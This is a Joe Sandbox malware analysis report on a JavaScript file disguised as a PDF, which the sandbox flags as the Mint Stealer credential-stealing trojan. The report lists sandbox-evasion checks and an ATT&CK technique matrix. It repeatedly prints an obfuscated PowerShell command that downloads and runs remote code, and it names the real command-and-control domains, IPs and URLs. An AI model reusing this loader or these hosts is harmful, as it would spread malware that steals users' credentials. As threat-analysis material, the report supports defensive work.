    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Queries memory information (via WMI often done to detect virtual machines)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6514Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3331Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664Thread sleep count: 6514 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664Thread sleep count: 3331 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196Thread sleep time: -4611686018427385s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware(
    Source: powershell.exe, 00000006.00000002.2521983936.000002217F9E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine(
    Source: powershell.exe, 00000006.00000002.2448002495.000002210020B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
    Source: powershell.exe, 00000006.00000002.2517545990.000002217F834000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt}
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
    Source: powershell.exe, 00000006.00000002.2448199396.000002210032E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`Sd
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
    Source: powershell.exe, 00000006.00000002.2517545990.000002217F834000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}nset
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
    Source: powershell.exe, 00000006.00000002.2449469659.00000221680E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected Mint Stealer
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2356, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected Mint Stealer
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2356, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information12
    Scripting    		Valid Accounts31
    Windows Management Instrumentation    		12
    Scripting    		11
    Process Injection    		121
    Virtualization/Sandbox Evasion    		OS Credential Dumping21
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts11
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		11
    Process Injection    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media3
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Exploitation for Client Execution    		Logon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information    		Security Account Manager121
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive4
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    PowerShell    		Login HookLogin Hook2
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture15
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials13
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    _DRP12938938231_PDF.js16%ReversingLabsScript-JS.Trojan.MalDorado

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://gidcldeaccadneh.top/q961kig3lwhtr.php?id=user-PC&key=111108474762&s=mints21100%Avira URL Cloudmalware
    http://$4hfinrz9wb6gea5/$g4lnbsurwm0thoz.php?id=$env:computernam0%Avira URL Cloudsafe
    http://schemas.mic_nU0%Avira URL Cloudsafe
    http://sfibhzu3ubhza.top/1.php?s=mints210%Avira URL Cloudsafe
    http://$4hfinrz9wb6gea5/$g4lnbsurwm0thoz.php?id=$env:computername&key=$bkxeljfcvmuyir&s=mints210%Avira URL Cloudsafe
    http://sfibhzu3ubhza.top0%Avira URL Cloudsafe
    http://ww1.V0%Avira URL Cloudsafe
    http://www.micros.0%Avira URL Cloudsafe
    http://gidcldeaccadneh.top100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    temp.sh
    		51.91.79.17
    		truefalse
      		high
      sfibhzu3ubhza.top
      		206.188.196.25
      		truetrue
        		unknown
        gidcldeaccadneh.top
        		206.188.196.37
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://gidcldeaccadneh.top/q961kig3lwhtr.php?id=user-PC&key=111108474762&s=mints21true
          • Avira URL Cloud: malware
          		unknown
          http://sfibhzu3ubhza.top/1.php?s=mints21true
          • Avira URL Cloud: safe
          		unknown
          https://temp.sh/aqdnA/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exefalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2502580487.000002217728C000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://schemas.mic_nUpowershell.exe, 00000006.00000002.2517384959.000002217F740000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://$4hfinrz9wb6gea5/$g4lnbsurwm0thoz.php?id=$env:computernampowershell.exe, 00000006.00000002.2449469659.0000022167673000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2449469659.0000022167441000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://$4hfinrz9wb6gea5/$g4lnbsurwm0thoz.php?id=$env:computername&key=$bkxeljfcvmuyir&s=mints21powershell.exe, 00000006.00000002.2449469659.0000022167673000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2449469659.0000022168890000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.2449469659.0000022167673000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2449469659.0000022167441000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://sfibhzu3ubhza.toppowershell.exe, 00000006.00000002.2449469659.0000022167441000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.microsoft.copowershell.exe, 00000006.00000002.2517545990.000002217F834000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000006.00000002.2502580487.000002217728C000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Iconpowershell.exe, 00000006.00000002.2502580487.000002217728C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://temp.sh/aqdnA/138d2a62b73e89fc4d09416bcefepowershell.exe, 00000006.00000002.2449469659.0000022168DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://temp.sh/aqdnA/138d2a62b7Xpowershell.exe, 00000006.00000002.2449469659.0000022168C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2449469659.0000022167441000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://temp.shpowershell.exe, 00000006.00000002.2449469659.0000022168C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.mpowershell.exe, 00000006.00000002.2517545990.000002217F912000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://ww1.Vpowershell.exe, 00000006.00000002.2517545990.000002217F834000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.micros.powershell.exe, 00000006.00000002.2517545990.000002217F834000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://temp.shpowershell.exe, 00000006.00000002.2449469659.0000022168C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.2449469659.0000022167673000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/powershell.exe, 00000006.00000002.2502580487.000002217728C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2502580487.000002217728C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://temp.sh/aqdnA/138d2a62b73e89fc4powershell.exe, 00000006.00000002.2449469659.0000022168DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://gidcldeaccadneh.toppowershell.exe, 00000006.00000002.2449469659.0000022168890000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://aka.ms/pscore68powershell.exe, 00000006.00000002.2449469659.0000022167221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2449469659.0000022167221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  206.188.196.25
                                                  		sfibhzu3ubhza.topUnited States
                                                  		55002DEFENSE-NETUStrue
                                                  206.188.196.37
                                                  		gidcldeaccadneh.topUnited States
                                                  		55002DEFENSE-NETUSfalse
                                                  51.91.79.17
                                                  		temp.shFrance
                                                  		16276OVHFRfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1556633
                                                  Start date and time:2024-11-15 18:15:09 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 51s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:9
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • GSI enabled (Javascript)
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:_DRP12938938231_PDF.js
                                                  Detection:MAL
                                                  Classification:mal100.troj.expl.evad.winJS@4/5@3/3
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 80%
                                                  • Number of executed functions: 17
                                                  • Number of non-executed functions: 22
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .js

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 2356 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: _DRP12938938231_PDF.js

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  12:16:23API Interceptor46x Sleep call for process: powershell.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  206.188.196.2582tI00QdFy.ps1Get hashmaliciousUnknownBrowse
                                                  • gibuzuy37v2v.top/1.php?s=mints13
                                                  peXF7I6W.ps1Get hashmaliciousUnknownBrowse
                                                  • gibuzuy37v2v.top/1.php?s=mints13
                                                  Fattura88674084.vbsGet hashmaliciousUnknownBrowse
                                                  • gibuzuy37v2v.top/1.php?s=mints13
                                                  Fattura88674084.vbsGet hashmaliciousUnknownBrowse
                                                  • gibuzuy37v2v.top/1.php?s=mints13
                                                  206.188.196.37ryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                  • gidcldeaccadneh.top/hqr7nx0sg1htr.php?id=computer&key=50024904669&s=mints13
                                                  ryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                  • gidcldeaccadneh.top/kdv0uaf47hhtr.php?id=user-PC&key=111095586772&s=mints13
                                                  Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                  • gidcldeaccadneh.top/d3q2k547nrhtr.php?id=computer&key=49178848774&s=mints21
                                                  Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                  • gidcldeaccadneh.top/xuceh2n0lohtr.php?id=user-PC&key=57894837609&s=mints21
                                                  Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                  • gidcldeaccadneh.top/06c2d9sea1htr.php?id=computer&key=21152678751&s=mints13
                                                  tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                  • gidcldeaccadneh.top/276lca0oqkhtr.php?id=computer&key=55933565450&s=mints13
                                                  tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                  • gidcldeaccadneh.top/9mtlfardohhtr.php?id=user-PC&key=89774062466&s=mints13
                                                  Fattura05736577.vbsGet hashmaliciousUnknownBrowse
